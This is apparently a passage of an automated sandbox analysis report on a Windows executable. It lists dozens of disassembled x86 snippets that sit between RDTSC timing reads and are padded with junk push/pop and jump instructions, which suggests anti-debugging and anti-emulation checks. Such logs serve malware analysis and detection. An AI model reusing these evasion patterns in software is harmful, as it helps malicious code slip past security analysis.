Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE0239 second address: CE0247 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE0247 second address: CE024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE41F4 second address: CE41F9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE41F9 second address: CE41FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE3B45 second address: CE3B5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE3B5E second address: CE3B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE3E39 second address: CE3E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE3E3D second address: CE3E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E8C1FDE1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE3E58 second address: CE3E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE3E5C second address: CE3E8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE8h 0x00000007 jmp 00007F43E8C1FDE5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE3E8D second address: CE3EB4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F43E91C5469h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F43E91C5456h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE3EB4 second address: CE3ED5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE3ED5 second address: CE3ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE3ED9 second address: CE3F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43E8C1FDDFh 0x0000000b jmp 00007F43E8C1FDE4h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE3F06 second address: CE3F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C5462h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE9A95 second address: CE9AB0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43E8C1FDDFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE8649 second address: CE865E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F43E91C5456h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE865E second address: CE8687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F43E8C1FDD6h 0x0000000c jg 00007F43E8C1FDD6h 0x00000012 je 00007F43E8C1FDD6h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b jc 00007F43E8C1FDE2h 0x00000021 jp 00007F43E8C1FDD6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE8A81 second address: CE8A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9C551 second address: C9C55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9C55E second address: C9C562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9C562 second address: C9C568 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9C568 second address: C9C5B3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43E91C5458h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, dword ptr [ebp+124816BCh] 0x00000011 mov dword ptr [ebp+122D1BF8h], edx 0x00000017 add eax, ebx 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F43E91C5458h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F43E91C5460h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9C5B3 second address: C9C5BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F43E8C1FDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9C5BD second address: C9C60C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F43E91C5458h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push esi 0x00000026 jo 00007F43E91C5459h 0x0000002c add dh, FFFFFFDEh 0x0000002f pop edi 0x00000030 push 00000004h 0x00000032 xor dx, AC41h 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a ja 00007F43E91C5461h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE8BC8 second address: CE8BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE8BD0 second address: CE8BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE8D31 second address: CE8D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F43E8C1FDD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F43E8C1FDD6h 0x00000012 jmp 00007F43E8C1FDE4h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE8D57 second address: CE8D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE8D5B second address: CE8D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CE8D61 second address: CE8D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F43E91C5456h 0x0000000e jmp 00007F43E91C545Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CEE626 second address: CEE649 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43E8C1FDE8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CED990 second address: CED9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C545Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CED9A6 second address: CED9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CEDAD4 second address: CEDAD9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CEDC10 second address: CEDC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CEDF09 second address: CEDF24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5463h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CEDF24 second address: CEDF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CEE0C0 second address: CEE0F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E91C5465h 0x00000009 jmp 00007F43E91C5468h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CEE0F1 second address: CEE10E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F43E8C1FDDCh 0x0000000e jng 00007F43E8C1FDDEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF49EC second address: CF4A0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F43E91C5460h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF56ED second address: CF570F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F43E8C1FDDCh 0x0000000c popad 0x0000000d pushad 0x0000000e jns 00007F43E8C1FDDAh 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF570F second address: CF5734 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F43E91C5468h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF5D4A second address: CF5D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF5D4E second address: CF5D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF5D52 second address: CF5D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF5D60 second address: CF5D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF6023 second address: CF6062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE8h 0x00000007 push esi 0x00000008 jmp 00007F43E8C1FDE6h 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F43E8C1FDD6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF6062 second address: CF6066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF6066 second address: CF606A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF606A second address: CF6076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF6076 second address: CF607A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF62FA second address: CF6300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF6300 second address: CF6309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF6309 second address: CF630D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF630D second address: CF6316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF6316 second address: CF6328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C545Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF6328 second address: CF633F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jl 00007F43E8C1FDF6h 0x0000000c jns 00007F43E8C1FDD8h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF6645 second address: CF6659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F43E91C5456h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CFA6FF second address: CFA70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F43E8C1FDD6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CFA70E second address: CFA712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CFA712 second address: CFA723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CFA723 second address: CFA733 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CFA733 second address: CFA737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF985D second address: CF9861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF9861 second address: CF986D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F43E8C1FDD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF986D second address: CF9874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF9874 second address: CF9883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF9883 second address: CF988F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF99F9 second address: CF99FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF99FE second address: CF9A0B instructions: 0x00000000 rdtsc 0x00000002 je 00007F43E91C5458h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF9B4C second address: CF9B64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDEh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF9B64 second address: CF9B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CF9D0A second address: CF9D3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F43E8C1FDDDh 0x00000016 jp 00007F43E8C1FDDEh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CFA25F second address: CFA268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CFA268 second address: CFA27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007F43E8C1FDD6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CFA27D second address: CFA281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CFA281 second address: CFA291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F43E8C1FDD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CFA291 second address: CFA29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F43E91C5456h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CFA29B second address: CFA2A1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CFA3E7 second address: CFA423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C5468h 0x00000009 pop edx 0x0000000a push edx 0x0000000b push ecx 0x0000000c jmp 00007F43E91C5468h 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CFA423 second address: CFA427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D077F5 second address: D077F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D077F9 second address: D0780E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F43E8C1FDDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D05BEA second address: D05C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 jno 00007F43E91C5456h 0x0000000c jnp 00007F43E91C5456h 0x00000012 pop esi 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D0603C second address: D06044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D06044 second address: D06048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D06048 second address: D0604C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D0604C second address: D06052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
